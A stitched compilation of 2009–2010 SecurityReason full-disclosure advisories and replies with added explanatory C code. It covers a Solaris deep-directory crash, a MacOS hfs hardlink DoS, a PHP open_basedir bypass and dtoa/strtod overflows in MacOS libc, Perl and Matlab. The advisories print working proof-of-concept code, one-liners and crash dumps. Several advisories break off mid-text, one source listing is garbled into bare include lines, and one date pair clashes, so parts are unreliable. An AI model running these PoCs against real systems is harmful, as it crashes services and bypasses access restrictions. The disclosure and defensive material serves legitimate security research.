Solaris is a Unix operating system introduced by Sun Microsystems in 1992 as the successor to SunOS. Sun Microsystems, Inc. is a wholly owned subsidiary of Oracle Corporation, selling computers, computer components, computer software, and information technology services. Sun was founded on February 24, 1982. The company was headquartered in Santa Clara, California (part of Silicon Valley), on the former west campus of the Agnews Developmental Center.

In computing, ZFS is a combined file system and logical volume manager designed by Sun Microsystems. The features of ZFS include support for high storage capacities, integration of the concepts of filesystem and volume management, snapshots and copy-on-write clones, continuous integrity checking and automatic repair, RAID-Z and native NFSv4 ACLs.

--- 1. Sun Solaris 10 filesystem rm(1),find(1),etc, Denial-of-service ---

We can create a deep tree, and when we remove, scan or do something else with this tree, the affected program will crash with a stack overflow symptom.

PoC:

# perl -e '$a="X";for(1..8000){ ! -d $a and mkdir $a and chdir $a }'

We need to use 1..8000 or a bigger value to make the stack overflow. In result:

# du X
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q du
(no debugging symbols found)
(gdb) r X
Starting program: /usr/bin/du X
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfeedfc8a in _ndoprnt () from /lib/libc.so.1
(gdb) x/i $eip
0xfeedfc8a <_ndoprnt+12>:       push   %ebp

We can simply remove this dir for 1..8000:

# rm -rf X
#

But let's try to create this:

# perl -e '$a="Y";for(1..5){ ! -d $a and mkdir $a and chdir $a }'
# rm -rf Y
Segmentation fault (core dumped)

rm(1) has failed! What is wrong? Stack overflow.

# /usr/local/bin/gdb -q rm
(no debugging symbols found)
(gdb) r -rf Y
Starting program: /usr/bin/rm -rf Y
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0x08051c03 in ?? ()
(gdb) x/i $eip
0x8051c03:      push   %ebx

# find Y CX >> /dev/null
Segmentation fault (core dumped)

find(1) also fails!

# /usr/local/bin/gdb -q find
(no debugging symbols found)
(gdb) r Y CX >> /dev/null
Starting program: /usr/bin/find Y CX >> /dev/null
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)

Program received signal SIGSEGV, Segmentation fault.
0xfeecfc8a in _ndoprnt () from /lib/libc.so.1
(gdb) x/i $eip
0xfeecfc8a <_ndoprnt+12>:       push   %ebp

--- 2. Fix ---

Sun Solaris will fix this issue.

--- 3. Greets ---

sp3x Infospec pi3

--- 4. Contact ---

Author: SecurityReason.com [ Maksymilian Arciemowicz ]
Email:
- cxib {a\./t] securityreason [d=t} com
GPG:
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com/
http://securityreason.com/exploit_alert/ - Exploit Database
http://securityreason.com/security_alert/ - Vulnerability Database
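rm(1), find(1) and du(1) die on the tree above because each directory level costs them one more recursive call, so the depth of the tree decides the stack depth. As an added example, not from the advisory and not Solaris code, here is a remover that keeps an explicit array of open directory handles instead of recursing and refuses any tree deeper than a caller-chosen limit rather than crashing part-way; make_chain() builds the same X/X/X/... shape under a constructed path so the behaviour can be checked locally, and both function names are chosen for this example.

```c
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700
#endif
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Build base/X/X/X/... with `depth` nested directories (example code),
 * using *at() calls so the absolute path length never matters.
 * Returns 0 on success, -1 on error. */
int make_chain(const char *base, int depth)
{
    int fd, next;

    if (mkdir(base, 0700) != 0 && errno != EEXIST)
        return -1;
    fd = open(base, O_RDONLY | O_DIRECTORY);
    if (fd < 0)
        return -1;
    while (depth-- > 0) {
        if (mkdirat(fd, "X", 0700) != 0 && errno != EEXIST) {
            close(fd);
            return -1;
        }
        next = openat(fd, "X", O_RDONLY | O_DIRECTORY);
        close(fd);
        if (next < 0)
            return -1;
        fd = next;
    }
    close(fd);
    return 0;
}

struct frame {
    DIR  *dir;      /* open handle for this level */
    char *name;     /* entry name in the parent (NULL for the root) */
};

/* Remove `root` and everything below it without recursion: an explicit
 * stack of at most max_depth+1 frames replaces the call stack, so memory
 * use is bounded by the caller's policy, not by RLIMIT_STACK. Returns the
 * number of files and directories removed (root included), or -1 on error
 * or when a directory deeper than max_depth is met, at which point the
 * walk stops instead of overflowing. */
long remove_tree_bounded(const char *root, int max_depth)
{
    struct frame *st;
    struct dirent *de;
    struct stat sb;
    long removed = 0;
    int top = 0, err = 0;

    if (max_depth < 0 || (st = calloc((size_t)max_depth + 1, sizeof *st)) == NULL)
        return -1;
    st[0].dir = opendir(root);
    if (st[0].dir == NULL) {
        free(st);
        return -1;
    }
    while (top >= 0 && !err) {
        int dfd = dirfd(st[top].dir);

        do {
            de = readdir(st[top].dir);
        } while (de != NULL &&
                 (strcmp(de->d_name, ".") == 0 || strcmp(de->d_name, "..") == 0));
        if (de == NULL) {                    /* level exhausted: pop it, then rmdir it */
            closedir(st[top].dir);
            if (top == 0)
                err = (rmdir(root) != 0);
            else
                err = (unlinkat(dirfd(st[top - 1].dir), st[top].name, AT_REMOVEDIR) != 0);
            free(st[top].name);
            st[top].dir = NULL;
            st[top].name = NULL;
            top--;
            if (!err)
                removed++;
            continue;
        }
        if (fstatat(dfd, de->d_name, &sb, AT_SYMLINK_NOFOLLOW) != 0) {
            err = 1;
        } else if (S_ISDIR(sb.st_mode)) {
            int fd;
            if (top + 1 > max_depth) {       /* too deep: refuse rather than recurse */
                err = 1;
                break;
            }
            fd = openat(dfd, de->d_name, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
            if (fd < 0 || (st[top + 1].dir = fdopendir(fd)) == NULL) {
                if (fd >= 0) close(fd);
                err = 1;
            } else {
                top++;
                st[top].name = strdup(de->d_name);
                if (st[top].name == NULL) err = 1;
            }
        } else if (unlinkat(dfd, de->d_name, 0) != 0) {   /* file, symlink, ... */
            err = 1;
        } else {
            removed++;
        }
    }
    for (; top >= 0; top--) {                /* release whatever is still open on error */
        if (st[top].dir) closedir(st[top].dir);
        free(st[top].name);
    }
    free(st);
    return err ? -1 : removed;
}
```

The depth limit is a policy knob: a 50-level chain is refused at max_depth 10 and removed at max_depth 100, and the count returned covers the 50 directories plus the root.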
[Full-disclosure] Sun Solaris 10 ftpd Cross-site request forgery
[ Sun Solaris 10 ftpd Cross-site request forgery ]

Author: Maksymilian Arciemowicz
SecurityReason.com

Date:
- Dis.: 24.02.2010
- Pub.: 21.05.2010

Affected Software:
- Sun Solaris 10 10/09
- OpenSolaris 2009.06

Original URL: http://securityreason.com/achievement_securityalert/84

--- 0. Description ---

in.ftpd is the Internet File Transfer Protocol (FTP) server process. The server may be invoked by the Internet daemon inetd(1M) each time a connection to the FTP service is made or run as a standalone server.

CWE-352: When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the web server which will be treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and can result in data disclosure or unintended code execution.

--- 1. Sun Solaris 10 ftpd Cross-site request forgery ---

The main problem exists in dividing a long command into a few others. The problem stems from the use of the for(;;) loop and the fgets() function, etc.

Example:

ftp://ftp.sun.com // /stat

or

ftp://ftp.sun.com
[Full-disclosure] MacOS X 10.6.3 filesystem hfs Denial of Service Vulnerability
[ MacOS X 10.6.3 filesystem hfs Denial of Service Vulnerability ]
Author: Maksymilian Arciemowicz http://SecurityReason.com
Date:
- Dis.: 01.04.2010
- Pub.: 23.04.2010
CVE: CVE-2010-0105
Risk: Medium
Affected Software:
- MacOS 10.6 (tested on 1062 and 1063)
NOTE: Prior versions may also be affected.
Original URL: http://securityreason.com/achievement_securityalert/83

--- 0. Description ---
Mac OS is the trademarked name for a series of graphical user interface-based operating systems developed by Apple Inc. (formerly Apple Computer, Inc.) for their Macintosh line of computer systems. The Macintosh user experience is credited with popularizing the graphical user interface. The original form of what Apple would later name the "Mac OS" was the integral and unnamed system software first introduced in 1984 with the original Macintosh, usually referred to simply as the System software.

--- 1. MacOS X 10.6.3 filesystem hfs Denial of Service ---
The main problem exists in the implementation of the filesystem (hfs). MacOS X 10.6.3 has hfs as the default filesystem, so the problem comes when we create a special structure with hardlinks. Interesting information is in Wikipedia: http://en.wikipedia.org/wiki/Hard_link

---
... Most modern operating systems don't allow hard links on directories to prevent endless recursion. A notable exception to this is Mac OS X v10.5 (Leopard) which uses hard links on directories for the Time Machine backup mechanism only. ...
---

In 10.6 we can't use the ln(1) command to create a hardlink to a directory (example: # ln C/C CX ). Anyway, we can use the link(3) function and we don't need any special privileges! It sounds nice to exploit it..
let's try. To show this issue, we need to use this program: ( http://securityreason.com/achievement_exploitalert/15 )

--- hfs_poc.c ---
/*
 * Proof of Concept for CVE-2010-0105
 * MacOS X 10.6 hfs file system attack (Denial of Service)
 * by Maksymilian Arciemowicz from SecurityReason.com
 * http://securityreason.com/achievement_exploitalert/15
 *
 * NOTE: This DoS will be localized in the phase "Checking multi-linked
 * directories", so we need to activate it with the line connlink("C/C","CX");
 * Now we need to create a PATH_MAX/2 directory tree to make the overflow,
 * and we should get diskutil and fsck_hfs exiting with sig=8
 *
 * ~ x$ diskutil verifyVolume /Volumes/max2
 * Started filesystem verification on disk0s3 max2
 * Performing live verification
 * Checking Journaled HFS Plus volume
 * Checking extents overflow file
 * Checking catalog file
 * Checking multi-linked files
 * Checking catalog hierarchy
 * Checking extended attributes file
 * Checking multi-linked directories
 * Maximum nesting of folders and directory hard links reached
 * The volume max2 could not be verified completely
 * Error: -9957: Filesystem verify or repair failed
 * Underlying error: 8: POSIX reports: Exec format error
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

/* create a directory with the usual mode bits, or exit */
int createdir(char *name){
    if(0!=mkdir(name,((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0))| S_IWUSR |S_IXUSR)){
        printf("Can`t create %s", name);
        exit(1);
    }
    return 0;
}

/* chdir into a directory, or exit */
int comein(char *name){
    if(0!=chdir(name)){
        printf("Can`t chdir in to %s", name);
        exit(1);
    }
    return 0;
}

/* create hardlink b -> a with link(2); on 10.6 this works on a directory */
int connlink(char *a, char *b){
    if(0!=link(a,b)){
        printf("Can`t create link %s => %s",a,b);
        exit(1);
    }
    return 0;
}

int main(int argc,char *argv[]){
    int level;
    if(argc==2) {
        level=atoi(argv[1]);
    }else{
        level=512; //default
    }
    createdir("C");
    createdir("C/C");
    connlink("C/C","CX"); //we need this to reach "checking multi-linked directories"
    comein("C");
    while(level--){
        int m=createdir("C");
        int c=comein("C");
        printf("Level: %i mkdir:%i chdir:%i\n",level,m,c);
    }
    printf("check diskutil verifyVolume /\n");
    return 0;
}
--- hfs_poc.c ---

or use

--- last.c ---
#include #include #include #include #include #include #include #include #include #include
/* function mkpath() from mkdir(1)/netbsd
 * Copyright for mkdir.c (c) 1983, 1992, 1993
 * The Regents of the University of Califo
Re: [Full-disclosure] PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass
Christian Sciberras wrote:
> What exactly are the implications of this?
> Surely no one [website] accepts paths.
> safe_mode and open_basedir usually use small providers.

Of course, it is idiotic to use safe_mode and open_basedir when we can bypass them via symlinks.

--
Best Regards,
pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) sub 4096g/0889FA9A 2008-08-22
http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
[Full-disclosure] PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass
[ PHP 5.2.12/5.3.1 session.save_path safe_mode and open_basedir bypass ]
Credit: Grzegorz Stachowiak
Provided by: SecurityReason.com
Date:
- Written: 31.01.2010
- Public: 11.02.2010
SecurityRisk: Medium
Affected Software:
- PHP 5.2.12
- PHP 5.3.1
Advisory URL: http://securityreason.com/achievement_securityalert/82
Vendor: http://www.php.net

--- 0. Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

A visitor accessing your web site is assigned a unique id, the so-called session id. This is either stored in a cookie on the user side or is propagated in the URL.

session.save_path defines the argument which is passed to the save handler. If you choose the default files handler, this is the path where the files are created. Defaults to /tmp. See also session_save_path(). There is an optional N argument to this directive that determines the number of directory levels your session files will be spread around in. For example, setting to '5;/tmp' may end up creating a session file and location like /tmp/4/b/1/e/3/sess_4b1e384ad74619bd212e236e52a5a174If . In order to use N you must create all of these directories before use. A small shell script exists in ext/session to do this, it's called mod_files.sh. Also note that if N is used and greater than 0 then automatic garbage collection will not be performed, see a copy of php.ini for further information. Also, if you use N, be sure to surround session.save_path in "quotes" because the separator (;) is also used for comments in php.ini.

--- 1. session.save_path safe mode and open basedir bypass ---
session.save_path can be set via the ini_set() and session_save_path() functions. session.save_path should contain the path where your tmp files will be saved.
But the syntax for session.save_path is:

[/PATH] OR [N;/PATH]

N - can also be a string (N should be numeric).

EXAMPLES:
1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS")
2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS")

The main problem arises when we use multiple ';' characters and create a fake directory structure to reduce '../'.

Proof of Concept:
0. Create directories: /humhum and /byp
1. set open_basedir = /byp
2. create test.php
   { session_save_path("/humhum"); session_start(); }
3. php test.php
   Warning: session_save_path(): open_basedir restriction in effect. File(/humhum) is not within the allowed path(s): (/byp) in /byp/test.php on line 3
4. subdir.php
   { mkdir("puf"); mkdir(";a"); }
5. php subdir.php
6. cd puf
7. create byp.php
   { session_save_path(";;/byp/;a/../../humhum"); session_start(); }
8. php byp.php
9. ls /humhum
   sess_d905eb71c9ad65ce2a845cdb0fed3016

The main problem is located in session.c. PHP doesn't check that we have used another ';' after the first one. Creating a fake directory structure (mkdir ';a', mkdir '../;a') we can reduce the directory level using '../'.

--- 2. Fix ---
Revision 294272
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_3/ext/session/session.c?view=log
http://svn.php.net/viewvc/php/php-src/branches/PHP_5_2/ext/session/session.c?view=log

--- 3. Credit ---
Found by: Grzegorz Stachowiak
Written by: Maksymilian Arciemowicz
Fixed by: Ilia Alshanetsky

--- 4. Contact ---
Email:
- Grzegorz Stachowiak: stachowiak [a,t} analogicode (d_0t} pl
- Maksymilian Arciemowicz: cxib {a.t] securityreason [d0_t} com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com/
http://securityreason.com/exploit_alert/ - Exploit Database
http://securityreason.com/security_alert/ - Vulnerability Database
Re: [Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
I have not checked this issue in macos 10.4. In MacOS 10.1 it does not work. But the perl script (in macos 10.5)

--- Chujwamwmuzg.pl ---
#!/usr/local/bin/perl
printf "%0.4194310f", 0x0.0x41414141;
--- Chujwamwmuzg.pl ---

will crash with
esi = 0x41414141
edi = 0x15

Other bugs in libc also work on new versions of macos. Example: overflow in the FTSENT structure
http://securityreason.com/achievement_securityalert/60
http://securityreason.com/achievement_securityalert/68

We confirmed this issue in MacOS 10.1.

Joshua Levitsky wrote:
> and it then rebooted my mac :)
>
> On Mon, Jan 11, 2010 at 1:57 PM, Joshua Levitsky <jlevi...@joshie.com> wrote:
>
> The below hosed my terminal session on 10.4.11... I did this in a
> console login so don't have the results.. You need? or is dropping
> me to a blue screen and lack of system response good?
>
> #!/usr/local/bin/perl
> printf "%0.4194310f", 0x0.0x41414141;
>
> Perl will crash with
> esi = 0x41414141
> edi = 0x15
>
> -Josh

--
Best Regards,
pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) sub 4096g/0889FA9A 2008-08-22
http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
Re: [Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
Joshua Levitsky wrote:
> On Thu, Jan 7, 2010 at 7:20 PM, Maksymilian Arciemowicz <c...@securityreason.com> wrote:
>
> [ MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ]
> Author: Maksymilian Arciemowicz and sp3x
> http://SecurityReason.com
> CVE: CVE-2009-0689
> CWE: CWE-119
> Risk: High
> Remote: Yes
>
> I tested doing "printf %1.262159f 1.1" in a shell login on 10.4.11 and
> it took out my session. I imagine this means 10.4.11 is vulnerable as
> well no? Tiger is still very popular in enterprise environments that are
> slow to upgrade.
>
> --
> Joshua Levitsky, MCSE, CISSP
> http://www.jnuxhosting.net
> http://www.jnux.net
> http://blog.joshie.com/
> [5957 F27C 9C71 E9A7 274A 0447 C9B9 75A4 9B41 D4D1]

Could you check the perl PoC? It should overwrite the esi and edi registers:
esi=0x41414141
edi=15

--
Best Regards,
pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) sub 4096g/0889FA9A 2008-08-22
http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
[Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
[ MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 08.01.2010
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes
Affected Software:
- MacOS 10.6
NOTE: Prior versions may also be affected.
Original URL: http://securityreason.com/achievement_securityalert/81

--- 0. Description ---
Mac OS is the trademarked name for a series of graphical user interface-based operating systems developed by Apple Inc. (formerly Apple Computer, Inc.) for their Macintosh line of computer systems. The Macintosh user experience is credited with popularizing the graphical user interface. The original form of what Apple would later name the "Mac OS" was the integral and unnamed system software first introduced in 1984 with the original Macintosh, usually referred to simply as the System software.

--- 1. MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ---
The main problem exists in the dtoa implementation. MacOS X has the same dtoa as OpenBSD, NetBSD etc. This problem affects not only libc/gdtoa; the strtod(3) function is also affected. For more information, please see SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63

But the fix for SREASONRES:20090625 used by OpenBSD was not good. More information about the fix for OpenBSD and similar systems is in SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. Kmax is defined as 15. Functions in dtoa don't check the Kmax limit, and it is possible to use elements >= 16 of the freelist array. It is true that the examples presented in the previous notes, using printf(1), do not work under MacOS X. This does not mean the MacOS X C library is safe.

More: http://cwe.mitre.org/data/definitions/119.html

--- 2. Proof of Concept (PoC) ---

--- 2.1. strtod(3) buffer overflow example PoC ---
#include <stdio.h>
#include <stdlib.h>

int main () {
    /* "0.11...11" is elided here; the real PoC string is a very long run of '1' digits */
    char number[] = "0.11...11", *e;
    double weed = strtod(number, &e);
    printf("grams = %lf\n", weed);
    return 0;
}

(gdb) r
Starting program: /Volumes/ARC/299
Reading symbols for shared libraries ++. done

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x0039f000
0x002271ac in __diff_D2A ()
(gdb) i r
eax    0xc71c71c7   -954437177
ecx    0xacb44      707396
edx    0x0          0
ebx    0x2c2e4f     2895439
esp    0xbffb65d0   0xbffb65d0
ebp    0xbffb6618   0xbffb6618
esi    0x39f000     3796992
edi    0x0          0
eip    0x2271ac     0x2271ac <__diff_D2A+246>
eflags 0x10246      66118
cs     0x17         23
ss     0x1f         31
ds     0x1f         31
es     0x1f         31
fs     0x0          0
gs     0x37         55

edi=0x0 eax=0xc71c71c7 eip=0x002271ac

(gdb) x/i 0x002271ac
0x2271ac <__diff_D2A+246>: mov %eax,(%esi)

--- 2.2. atof(3) buffer overflow example PoC ---
#include <stdio.h>
#include <stdlib.h>

int main() {
    /* "111.11...11" is elided as above; m0.c below is 317507 bytes long */
    char s[]="111.11...11";
    float a=atof(s);
    printf("%f",a);
    return 0;
}

x$ ls -la m0.c
-rwxrwxrwx@ 1 x staff 317507 Jan 3 14:23 m0.c
x$ gcc -o m0 m0.c
x$ ./m0
Bus error

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x0039f000
0x00227017 in __lshift_D2A ()
(gdb) x/i 0x00227017
0x227017 <__lshift_D2A+68>: movl $0x0,(%edx)
(gdb) i r
eax    0x16bc       5820
ecx    0x80b6       32950
edx    0x39f000     3796992
ebx    0x2c2e4f     2895439
esp    0xbffb2070   0xbffb2070
ebp    0xbffb20b8   0xbffb20b8
esi    0x26bd       9917
edi    0x80b7       32951
eip    0x227017     0x227017 <__lshift_D2A+68>
eflags 0x10203      66051
cs     0x17         23
ss     0x1f         31
ds     0x1f         31
es     0x1f         31
fs     0x0          0
gs     0x37         55
(gdb) bt
#0 0x00227017 in __lshift_D2A ()
#1 0x002c3b74 in strtod_l$UNIX2003 ()
#2 0x00275ba7 in atof ()
#3 0x17eb in main ()

--- 3. SecurityReason Note ---
Officially SREASONRES:20090625 has been detected in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- Mozilla Thunderbird
- Mozilla Sunbird
- Mozilla Camino
- KDE (example: konqueror)
- Opera
- K-Meleon
- F-Lock
- MatLab
- J

This list is not yet closed.
The FreeBSD project has fixed this issue (state 2010-01-05) only in:
MAIN
RELENG_8_0_BP
RELENG_8_0_0_RELEASE
RELENG_8_0
RELENG_7
RELENG_6

Please note that the issue can also exist in Sony PlayStation 3. The license of PS3: http://www.scei.co.jp/ps3-license/see.html
---
The separate 'dtoa.c' file is separately licenced, thus: Copyright. 1991, 2000 by Lucent Technologies.
---
MacOS gdtoa also has "Lucent
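The Kmax/freelist description above is repeated word for word in the Matlab, J, Sunbird, Thunderbird and Camino advisories in this thread, so one added illustration serves all of them. It is a simplified C model written for this page, not code from any libc, gdtoa or SecurityReason: the size class is derived from the digit count under the assumption that dtoa packs 9 decimal digits per 32-bit word and rounds the word count up to a power of two, and the Balloc/Bfree pair adds the Kmax bound check the advisories say is missing, sending larger classes to malloc/free instead of indexing the 16-slot freelist.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define Kmax 15                 /* freelist has Kmax+1 = 16 slots, indices 0..15 */

/* Simplified Bigint header (modelled for this example, not dtoa's real struct). */
typedef struct Bigint {
    struct Bigint *next;
    int k;                      /* size class: 2^k 32-bit words of digit storage */
    int maxwds;
    unsigned int x[1];          /* digit words follow; maxwds of them are allocated */
} Bigint;

static Bigint *freelist[Kmax + 1];

/* Size class a decimal string of nd digits needs. Assumption: 9 digits per
 * word and the word count rounded up to a power of two, so k keeps growing
 * with the input length and nothing in this computation caps it at Kmax. */
int size_class_for_digits(unsigned long nd) {
    unsigned long words = (nd + 8) / 9;
    int k = 0;
    for (unsigned long y = 1; words > y; y <<= 1) k++;
    return k;
}

/* True only if k is a valid index into freelist[]; the unchecked code the
 * advisories describe indexes freelist[k] without asking this question. */
int freelist_index_ok(int k) { return k >= 0 && k <= Kmax; }

/* Checked allocator: size classes above Kmax never touch the freelist. */
Bigint *balloc_checked(int k) {
    Bigint *rv;
    if (k < 0 || k > 30) return NULL;                 /* keep 1 << k sane */
    if (freelist_index_ok(k) && (rv = freelist[k]) != NULL) {
        freelist[k] = rv->next;                       /* pop a recycled block */
    } else {
        int x = 1 << k;
        size_t len = sizeof(Bigint) + (size_t)(x - 1) * sizeof(unsigned int);
        rv = malloc(len);
        if (rv == NULL) return NULL;
        rv->k = k;
        rv->maxwds = x;
    }
    rv->next = NULL;
    return rv;
}

/* Matching free: blocks with k > Kmax go back to the heap, not to freelist[k]. */
void bfree_checked(Bigint *v) {
    if (v == NULL) return;
    if (!freelist_index_ok(v->k)) { free(v); return; }
    v->next = freelist[v->k];
    freelist[v->k] = v;
}

/* A small class is recycled through its freelist slot: the second request
 * for class 3 hands back the block the first one released. */
int small_class_is_recycled(void) {
    Bigint *a = balloc_checked(3);
    bfree_checked(a);
    Bigint *b = balloc_checked(3);
    int same = (a == b);
    bfree_checked(b);
    return same;
}

/* A class above Kmax is served and released without any freelist access. */
int large_class_served_safely(int k) {
    Bigint *a = balloc_checked(k);
    if (a == NULL || a->k != k || a->maxwds != (1 << k)) { bfree_checked(a); return 0; }
    memset(a->x, 0, (size_t)a->maxwds * sizeof(unsigned int));   /* storage is usable */
    bfree_checked(a);
    return 1;
}

int main(void) {
    unsigned long nd = 296450;    /* digit count used by the Sunbird/Thunderbird PoC */
    int k = size_class_for_digits(nd);
    printf("%lu digits -> size class k=%d, valid freelist index: %s\n",
           nd, k, freelist_index_ok(k) ? "yes" : "no");
    return 0;
}
```

Under this model 294912 digits still land in class 15, and one more digit pushes the request to class 16, the first index past the 16-slot array.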
[Full-disclosure] Matlab R2009b Array Overrun (code execution)
[ Matlab R2009b Array Overrun (code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 08.01.2009
CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes
Affected Software:
- Matlab R2009b
NOTE: Prior versions may also be affected.
Original URL: http://securityreason.com/achievement_securityalert/80

--- 0. Description ---
MATLAB is a numerical computing environment and fourth generation programming language. Developed by The MathWorks, MATLAB allows matrix manipulation, plotting of functions and data, implementation of algorithms, creation of user interfaces, and interfacing with programs in other languages. Although it is numeric only, an optional toolbox uses the MuPAD symbolic engine, allowing access to computer algebra capabilities. An additional package, Simulink, adds graphical multidomain simulation and Model-Based Design for dynamic and embedded systems. In 2004, MathWorks claimed that MATLAB was used by more than one million people across industry and the academic world.

--- 1. Matlab 2009b Array Overrun (code execution) ---
The main problem exists in the dtoa implementation. Matlab has the same dtoa as Mozilla, OpenBSD, MacOS, Google, Opera etc., and it is the same as SREASONRES:20090625.
http://securityreason.com/achievement_securityalert/63

But the fix for SREASONRES:20090625 used by OpenBSD was not good. More information about the fix for OpenBSD and similar systems is in SREASONRES:20091030,
http://securityreason.com/achievement_securityalert/69

We can create any number of float, which will overwrite the memory. Kmax is defined as 15. Functions in dtoa don't check the Kmax limit, and it is possible to use elements >= 16 of the freelist array.

--- 2. Proof of Concept (PoC) ---
There are several ways to make a successful attack. The simplest assumes the creation of a script with a defective floating-point variable and executing it. This will allow the possibility of code execution.

-expl.m--
cxib=0.
-expl.m--

MATLAB crash file: C:\DOCUME~1\WinXPae\USTAWI~1\Temp\matlab_crash_dump.552

Segmentation violation detected at Wed Dec 03 12:04:02 2009

Configuration:
MATLAB Version: 7.9.0.529 (R2009b)
MATLAB License: [PRIV]
Operating System: Microsoft Windows XP
Window System: Version 5.1 (Build 2600: Dodatek Service Pack 3)
Processor ID: x86 Family 6 Model 7 Stepping 6, GenuineIntel
Virtual Machine: Java 1.6.0_12-b04 with Sun Microsystems Inc. Java HotSpot(TM) Client VM mixed mode
Default Encoding: windows-1250

Fault Count: 1

Register State:
EAX = 71c71c71 EBX = 188ade48
ECX = 000a EDX = 188adde0
ESI = 0002 EDI = 0003
EBP = 00c3dec0 ESP = 00c3de90
EIP = 7baf965e FLG = 00010206

Stack Trace:
[0] libut.dll:_Balloc(0x188adde0, 0x188ade48, 10, 1) + 14 bytes
[1] libut.dll:_s2b(0x188adde0, 33, 33, 0x069f6bc7) + 112 bytes
[2] libut.dll:_ut_strtod(0x188adde0, 0x19a80048 "0.11..", 0x00c3e024, 0x00c3e028) + 1123 bytes
[3] m_ir.dll:_mps_parse_matlab_real(0x188ad9f0, 0x00c3e068, 11, 0) + 576 bytes
[4] m_parser.dll:_mps_convert_M_NUMBER(0x188afb90, 0x1971d070, 0x1971d048, 0x188afb90) + 71 bytes
[5] m_parser.dll:_mps_convert_lval(0x188afb90, 0x1971d048, 0x1971d070, 0) + 224 bytes
[6] m_parser.dll:_mps_convert_M_Primary_4(0x188afb90, 0x1971d084, 0x1971d0e8, 0x188afb90) + 191 bytes
[7] m_parser.dll:_mps_convert_M_Stmt_2(0x188afb90, 0x1971d0d4, 0x1971d0e8, 0x188afb90) + 247 bytes
[8] m_parser.dll:_mps_convert_M_Stmts_2(0x188afb90, 0x1971d0e8, 0x188afb90, 0x199d95b0) + 703 bytes
[9] m_parser.dll:_mps_make_M_body_from_parse_tree(0x1971d0e8, 0, 37, 0) + 1283 bytes
[10] m_parser.dll:_mps_convert_script(0x00c3e788, 18, 0x00c3e550 "đĺĂ", 0x7a36323f) + 1073 bytes
[11] m_parser.dll:_mps_convert_M_File_1(0x188afb90, 0x189b3960, 0x188afb90, 0x189b3960) + 66 bytes
[12] m_parser.dll:_mps_M_to_IR_eval(0x00c3e7b4, 0x00c3e774, 0x00c3e778, 0x00c3e77c) + 1471 bytes
[13] m_parser.dll:_mps_M_to_IR(0x00c3e80f, 0x00c3e7b4, 0x00c3e774, 0x00c3e778) + 307 bytes
[14] m_interpreter.dll:public: void __thiscall Mfh_mp::inCompileMfile(char const *)(0x03ba1a86 "C:\Documents And Settings\WinXPa..", 1, 0x1977c300 "¤Ä.z", 0x0085) + 492 bytes
[15] m_interpreter.dll:public: void __thiscall Mfh_mp::inCompileMOrLoadPFile(void)(0, 0x7a1459e2, 1, 0x1977c300 "¤Ä.z") + 266 bytes
[16] m_interpreter.dll:public: virtual void __thiscall Mlm_mp::load_file(void)(0, 0x1977c300 "¤Ä.z", 0, 0x78134c58) + 32 bytes
[17] m_dispatcher.dll:public: void __thiscall Mlm_MATLAB_fn::try_load(void)(0x19728978, 0x78159334, 1, 0x00c3ee54 "ŘďĂ") + 71 bytes
[18] m_dispatcher.dll:public: void __thiscall Mlm_MATLAB_fn::load(void)(0, 0x19
[Full-disclosure] J 6.02.023 Array Overrun (code execution)
[ J 6.02.023 Array Overrun (code execution) ]
Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
